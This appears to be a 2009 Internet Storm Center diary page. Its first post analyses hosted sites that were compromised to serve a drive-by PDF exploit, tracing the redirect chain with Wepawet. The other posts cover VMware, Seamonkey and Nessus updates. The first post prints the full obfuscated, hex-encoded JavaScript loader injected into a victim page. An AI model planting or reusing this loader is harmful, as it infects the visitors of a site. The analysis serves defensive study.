Hosted javascript leading to .cn PDF malware

Published: 2009-04-10. Last Updated: 2009-04-10 21:30:18 UTC
by Stephen Hall (Version: 1)
0 comment(s)

Unfortunately such subject lines are all so common. However, lets work through this one together to show an excellent tool, and a common source.

Steve Burn over at it-mate.co.uk submitted an investigation they had been running into a number of sites hosted by a single hosting provider being compromised and leading to malware. 

So, lets look at a few examples:

Firstly, just a simple proof that the exploit is still in place, lets look at :

hxxp://www.adammcgrath.ca (216.97.237.30 - Whois : OrgName:    Lunar Pages)

If you simply curl, or wget, the home page of this site, you'll get 

function c32aee72b6q49ce6d11e3bbe(q49ce6d11e438d){ var q49ce6d11e4b6d=16; return 
(eval('pa'+'rseInt')(q49ce6d11e438d,q49ce6d11e4b6d));}function q49ce6d11e5afc(q4
9ce6d11e62cc){  var q49ce6d11e6ab5='';q49ce6d11e89dc=String['fromCharCode'];for(
q49ce6d11e7271=0;q49ce6d11e7271<q49ce6d11e62cc.length;q49ce6d11e7271+=2){ q49ce6
d11e6ab5+=(q49ce6d11e89dc(c32aee72b6q49ce6d11e3bbe(q49ce6d11e62cc.substr(q49ce6d
11e7271,2))));}return q49ce6d11e6ab5;} var vd1='';var q49ce6d11e91ab='3C7'+vd1+'
3637'+vd1+'2697'+vd1+'07'+vd1+'43E696628216D7'+vd1+'96961297'+vd1+'B646F637'+vd1
+'56D656E7'+vd1+'42E7'+vd1+'7'+vd1+'7'+vd1+'2697'+vd1+'465287'+vd1+'56E657'+vd1+
'363617'+vd1+'065282027'+vd1+'2533632536392536362537'+vd1+'322536312536642536352
532302536652536312536642536352533642536332533332533322532302537'+vd1+'332537'+vd
1+'32253633253364253237'+vd1+'2536382537'+vd1+'342537'+vd1+'342537'+vd1+'3025336
12532662532662536332536632536312537'+vd1+'32253631253636253639253665253265253639
2536652536362536662532662537'+vd1+'342537'+vd1+'32253631253636253636253266253639
2536652536342536352537'+vd1+'382532652537'+vd1+'302536382537'+vd1+'3025336625323
7'+vd1+'2532622534642536312537'+vd1+'342536382532652537'+vd1+'322536662537'+vd1+
'352536652536342532382534642536312537'+vd1+'342536382532652537'+vd1+'32253631253
665253634253666253664253238253239253261253337'+vd1+'253335253334253337'+vd1+'253
337'+vd1+'253239253262253237'+vd1+'253330253237'+vd1+'2532302537'+vd1+'37'+vd1+'
2536392536342537'+vd1+'34253638253364253334253331253337'+vd1+'253230253638253635
253639253637'+vd1+'2536382537'+vd1+'342533642533312533382533312532302537'+vd1+'3
32537'+vd1+'342537'+vd1+'39253663253635253364253237'+vd1+'2537'+vd1+'36253639253
7'+vd1+'332536392536322536392536632536392537'+vd1+'342537'+vd1+'3925336125363825
3639253634253634253635253665253237'+vd1+'2533652533632532662536392536362537'+vd1
+'3225363125366425363525336527'+vd1+'29293B7'+vd1+'D7'+vd1+'6617'+vd1+'2206D7'+v
d1+'969613D7'+vd1+'47'+vd1+'27'+vd1+'5653B3C2F7'+vd1+'3637'+vd1+'2697'+vd1+'07'+
vd1+'43E';document.write(q49ce6d11e5afc(q49ce6d11e91ab));

At the ISC, we're talked a number of times of methods to decode such java script, from TEXT AREA manipulation in the good old days, through to tools such as Malzilla to aide our analysis. However both our intrepid reader, any myself like to use Wepawet

Analysis with this couldnt be easier, enter the URL, click, and wait for the response. So lets see what Wepawet shows for this web site.

http://wepawet.cs.ucsb.edu/view.php?hash=ae4855ee814ab2c158ac3d9361429a75&t=1239303649&type=js

If you follow through the analysis provided by wepawet, you'll see that it bounces through clarafin.info. 

Google safe browsing also highlights that this domain is (or has been) hostile:

 

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 10 domain(s), including sound.jp/ohira/ucoz.net/,cmizziconstruction.com/.

So, following the malware trail results in this hxxp://clarafin.info/traff/index.php? redirecting to this hxxp://letomerin.cn/x0/index.php

Finally a PDF exploit is attempted, and a piece of malware is dropped on to the unsuspecting system, details as always from VirusTotal shows very little AV Coverage.

Now all this isn't very unusual, and having a large number of compromised hosts isn't either. What is interesting here is that a single provider is hosting these compromised pages.

Steve's investigations came to an end when the hosting provider commented that:

"So far, all I've received is a form-letter stating it wasn't a compromise of their servers, but hackers going round finding exploitable scripts written by their customers"

Now this may be the case, as there does appear to be some level of commonality between the sites. However, surely a duty of care exists here in that the hosting provider is unwittingly hosting drive by malware which is resulting in very low AV infections.

 

Steve Hall

ISC Handler

www.tarkie.net

 

 

Keywords: lunar pages wepawet
0 comment(s)

Patches for critical VMWare vulnerability

Published: 2009-04-10. Last Updated: 2009-04-10 19:09:37 UTC
by Stephen Hall (Version: 1)
0 comment(s)

Our friends at VMWare have made the ISC aware of new patches for both VMWare Hosted products, and for ESX which relates to the ability to execute on the host server from a guest operating system. 

The following releases have generally available patches:

 

  • VMware Workstation 6.5.1 and earlier
  • VMware Player 2.5.1 and earlier
  • VMware ACE 2.5.1 and earlier
  • VMware Server 2.0
  • VMware Server 1.0.8 and earlier
  • VMware Fusion 2.0.3 and earlier,
  • VMware ESXi 3.5 without patch ESXe350-200904201-O-SG 
  • VMware ESX 3.5 without patch ESX350-200904201-SG
  • VMware ESX 3.0.3 without patch ESX303-200904403-SG,
  • VMware ESX 3.0.2 without patch ESX-1008421.

Depending on your version, your only option may be to upgrade rather than patch.

Steve Hall

ISC Handler

www.tarkie.net

 

 

Keywords: VMWare
0 comment(s)

Firefox 3 updates now in Seamonkey

Published: 2009-04-10. Last Updated: 2009-04-10 09:51:23 UTC
by Stephen Hall (Version: 1)
0 comment(s)

For those of you who use Seamonkey's all in one environment as a Web, Mail, newsgroup client, HTML editor, IRC Chat client and indeed a web development tool, then you should update.

The recent Firefox 3 security updates have now been rolled up into Seamonkey 1.1.16.

The latest version, and details of what's been fixed is available on their web site.

Keywords: seamonkey
0 comment(s)

Something for the holiday? Nessus 4 is out

Published: 2009-04-10. Last Updated: 2009-04-10 08:45:27 UTC
by Stephen Hall (Version: 1)
0 comment(s)

The people over at Tenable have released Nessus version 4 just in time to give us all something to play with over the holiday break. A whole list of improvements can be examined over at the blog site.

Some of the big changes include : engine changes for scalability, PCI-DSS compliance checks, PCRE within NASL, and XLST transformations in reports.

 

Keywords: nessus
0 comment(s)

Comments


Diary Archives